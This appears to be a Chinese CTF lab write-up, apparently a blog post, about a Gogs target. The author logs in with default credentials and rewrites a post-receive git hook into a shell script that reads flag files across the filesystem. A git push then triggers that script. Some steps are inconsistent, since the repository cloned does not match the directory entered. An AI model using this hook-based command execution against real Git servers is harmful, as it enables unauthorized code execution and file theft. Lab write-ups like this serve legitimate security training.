1.阅读靶场介绍
这里我们可以得到的有用信息就是
账号/密码:
gogs_admin/admin123
以及方式:
攻击者可通过特定 API 接口绕过安全检查,构造符号链接指向 .git/config 配置文件,并对其内容进行修改。通过在配置文件中注入恶意 sshCommand 参数,攻击者可在系统执行 Git 相关操作时触发远程命令执行
带着思路我们去启动靶场
2.启动靶场
我们会得到如下界面
我们点击右上角的登录
输入靶场介绍哪里的账号/密码:gogs_admin/admin123
我们就可以得到如下的后台
接下来我们点击这个加号,任何创建新的仓库
这里的名字可以自己随便起一个
博主这里就用flag
接下来点击创建仓库,然后我们带年纪右上角的仓库设置
然后点击左边的管理git钩子
然后点击post-receive最右边的那个笔,
然后把代码改成如下所示
以下是参考代码
#!/bin/sh
cat /flag 2>/dev/null || cat /root/flag 2>/dev/null || {
find / -maxdepth 2 -name 'flag*' -type f 2>/dev/null | while read f; do
echo "==== $f ===="
cat "$f" 2>/dev/null
done
}
exit 0
结果如下图所示
然后点击更新钩子设置,保存好以后
3.终端环节
首先我们要下载一个git库
https://git-scm.com/download/win
这个是url,下载好了,接下来就是无脑下一步
下载好以后哦我们可以执行下述步骤
像博主这里的下图所示,最后就是点击确定一个个退出来
到这步就完成好git的安装和配置了
然后执行这个命令
git clone http://gogs_admin:admin123@8.147.132.32:36646/gogs_admin/flag
这里中间那串数字要对应自己的url
末尾的文件名字要对应
再然后执行
cd ctf64111_test
echo test > README.md
git add README.md
git commit -m "trigger hook"
git push origin master这里博主一直执行到这步出了问题
然后博主是执行这两个命令就成功了
这里的参数随便填然后再执行这个
git commit -m "trigger hook"
最后我们可以跑出来这个flag
扫一扫
&spm=1001.2101.3001.5002&articleId=162236697&d=1&t=3&u=0757a20a9aa24f4788d501294a967f5a)
962
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
